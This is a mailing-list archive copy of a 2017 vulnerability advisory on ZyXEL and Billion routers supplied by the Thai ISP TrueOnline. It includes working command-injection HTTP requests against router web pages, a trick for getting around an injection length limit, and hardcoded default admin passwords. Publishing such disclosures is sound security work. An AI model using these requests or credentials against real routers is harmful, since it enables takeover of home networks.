lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <abf355ef-1d4d-7f31-7273-71044ab8c3c1@gmail.com>
Date: Mon, 16 Jan 2017 10:46:45 +0000
From: Pedro Ribeiro <pedrib@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>,
 bugtraq@...urityfocus.com
Subject: [FD] Multiple RCE in ZyXEL / Billion / TrueOnline routers

Hi,

TrueOnline is a Thai ISP that distributes customised versions of ZyXEL
and Billion routers - customised with vulnerabilities that is.
The routers contain several default administrative accounts and command
injections that can be abused by authenticated and unauthenticated
attackers. Details in the advisory below, which is a copy of
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt
Metasploit modules have been released, see below.

This vulnerability was disclosed through the Securiteam Secure
Disclosure program:
https://blogs.securiteam.com/index.php/archives/2910
http://www.beyondsecurity.com/ssd

Regards,
Pedro

===============
>> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers
>> Discovered by Pedro Ribeiro (pedrib@...il.com), Agile Information
Security
==========================================================================
Disclosure: 26/12/2016 / Last updated: 12/01/2017


>> Summary:
TrueOnline is a major Internet Service Provider in Thailand which
distributes various rebranded ZyXEL and Billion routers to its customers.
Three router models - ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion
5200W-T - contain a number of default administrative accounts, as well
as authenticated and unauthenticated command injection vulnerabilities
in their web interfaces, mostly in the syslog remote forwarding
function. All the routers are still in widespread use in Thailand, with
the Billion 5200W-T router currently being distributed to new customers.

These routers are based on the TC3162U SoC (or variants of it), a
system-on-a-chip made by TrendChip, which was a manufacturer of SoC that
was acquired by Ralink / MediaTek in 2011.
TC3162U based routers have two firmware variants.

The first variant is "ras", used on hardware versions that have 4mb or
less of flash storage, which is based on the real time operating system
ZynOS. It is infamous as the includes Allegro RomPager v4.07, which is
vulnerable to the "misfortune cookie" attack (see [1]), and its web
server is vulnerable to the "rom-0" attack (see [2]).
The other variant is "tclinux", which is a full fledged Linux used in
hardware versions that have more than 4 MB of flash storage. This
advisory refers to this variant, which includes the Goahead web server
and several ASP files with the command injection vulnerabilities. Note
that tclinux might also be vulnerable to the misfortune cookie and rom-0
attacks - this was not investigated in detail by the author. For more
information on tclinux see [3].

It should be noted that tclinux contains files and configuration
settings in other languages (for example in Turkish). Therefore it is
likely that these firmware versions are not specific to TrueOnline, and
other ISP customised routers in other countries might also be
vulnerable. It is also possible that other brands and router models that
use the tclinux variant are also affected by the command injection
vulnerabilities (the default accounts are likely to be TrueOnline
specific). Please contact pedrib@...il.com if you find any other routers
or firmware versions that have the same vulnerabilities.

These vulnerabilities were discovered in July 2016 and reported through
Securiteam's Secure Disclosure program (see
https://blogs.securiteam.com/index.php/archives/2910 for their
advisory). SSD contacted the vendors involved, but received no reply and
posted their advisory on December 26th 2016. There is currently no fix
for these issues. It is unknown whether these issues are exploitable
over the WAN, although this is a possibility since some of the default
accounts appear to have been deployed for ISP use.

Three Metasploit modules that abuse these vulnerabilities have been
released (see [4], [5] and [6]).


>> Technical details:
#1
Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T v1)
NO-CVE
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker in the LAN.
See below for other constraints.
Affected versions:
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions
might be affected

This router has a command injection vulnerability in the Maintenance >
Logs > System Log > Remote System Log forwarding function.
The vulnerability is in the ViewLog.asp page, which is accessible
unauthenticated. The following request will cause the router to issue 3
ping requests to 10.0.99.102:

POST /cgi-bin/ViewLog.asp HTTP/1.1
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save

The command in injection is in the remote_host parameter.
This vulnerability was found during a black box assessment of the web
interface, so a root cause was not determined.


#2
Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2)
NO-CVE
Attack Vector: Remote
Constraints: Can be exploited by an authenticated attacker in the LAN.
See below for other constraints.
Affected versions:
- ZyXEL P660HN-T, hardware revision v2, TrueOnline firmware version
TCLinux Fw #7.3.37.6, other firmware versions might be affected

Unlike in the P660HN-Tv1, the injection is authenticated and in the
logSet.asp page. However, this router contains a hardcoded supervisor
password (see below) that can be used to exploit this vulnerability.
The injection is in the logSet.asp page that sets up remote forwarding
of syslog logs, and the parameter vulnerable to injection is the
serverIP parameter, which can be abused in the following way:

ServerIP=1.1.1.1`<COMMAND>`&#

The following request will cause the router to issue 3 ping requests to
1.1.1.1:

POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1
logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping
-c 3 1.1.1.1`%26%23&serverPort=514

This vulnerability was found during a black box assessment of the web
interface, so a root cause was not determined. It is known that this
injection ends up in  /etc/syslog.conf as

The actual injection is limited to 28 characters. This can circunvented
by writing a shell script file in the /tmp directory 28 characters at a
time, and the executing that file.


#3
Vulnerability: Unauthenticated command injection (Billion 5200W-T)
NO-CVE
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker in the LAN.
See below for other constraints.
Affected versions:
- Billion 5200W-T, TrueOnline firmware version 1.02b.rc5.dt49, other
firmware versions might be affected

The Billion 5200W-T router contains an unauthenticated command injection
in adv_remotelog.asp page, which is used to set up remote syslog forwarding.
The following request will cause the router to issue 3 ping requests to
192.168.1.35:

POST /cgi-bin/adv_remotelog.asp HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514

The injection is on the syslogServerAddr parameter and can be exploited
by entering a valid IP address, followed by  ";<COMMAND>;"
This vulnerability was found during a black box assessment of the web
interface, so a root cause was not determined.


#4
Vulnerability: Authenticated command injection (Billion 5200W-T)
NO-CVE
Attack Vector: Remote
Constraints: Can be exploited by an authenticated attacker in the LAN.
See below for other constraints.
Affected versions:
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008
130603, other firmware versions might be affected

The Billion 5200W-T router also has several other command injections in
its interface, depending on the firmware version, such as an
authenticated command injection in tools_time.asp (uiViewSNTPServer
parameter).
It should be noted that this router contains several hardcoded
administrative accounts that can be used to exploit this vulnerability.
This injection can be exploited with the following request:

POST /cgi-bin/tools_time.asp HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Cookie: SESSIONID=7c082c75

SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+192.168.0.1+%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA

This writes the command to a file /etc/ntp.sh:
/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 192.168.0.1 &#" &
which is then executed almost immediately.

This vulnerability was found during a black box assessment of the web
interface, so a root cause was not determined.


#5
Vulnerability: Default administrative credentials (ZyXEL P660HN-T v1)
NO-CVE
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions
might be affected

This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true


#6
Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2)
NO-CVE
Attack Vector: Remote
Constraints: N/A
Affected versions:
- ZyXEL P660HN-T, hardware revision v2, TrueOnline firmware version
TCLinux Fw #7.3.37.6, other firmware versions might be affected

This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
username: supervisor; password: zyad1234


#7
Vulnerability: Authenticated command injection (Billion 5200W-T)
NO-CVE
Attack Vector: Remote
Constraints: N/A
Affected versions:
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008
130603, other firmware versions might be affected

This router contains the following default administrative accounts:
username: admin; password: password
username: true; password: true
username: user3; password:
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678


>> Fix:
There is NO FIX for this vulnerability. Do not allow untrusted clients
to connect to these routers. Timeline of disclosure:
July 2016: Vulnerability reported to Securiteam Secure Disclosure
           Securiteam contacted the affected versions. No response.

26.12.2016: Vulnerability information published in the SSD blog.
12.01.2017: Vulnerability information published in
https://github.com/pedrib/PoC


>> References:
[1] http://www.kb.cert.org/vuls/id/561444
[2]
https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/
[3] https://vasvir.wordpress.com/tag/trendchip-firmware/
[4] https://github.com/rapid7/metasploit-framework/pull/7820
[5] https://github.com/rapid7/metasploit-framework/pull/7821
[6] https://github.com/rapid7/metasploit-framework/pull/7822


================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ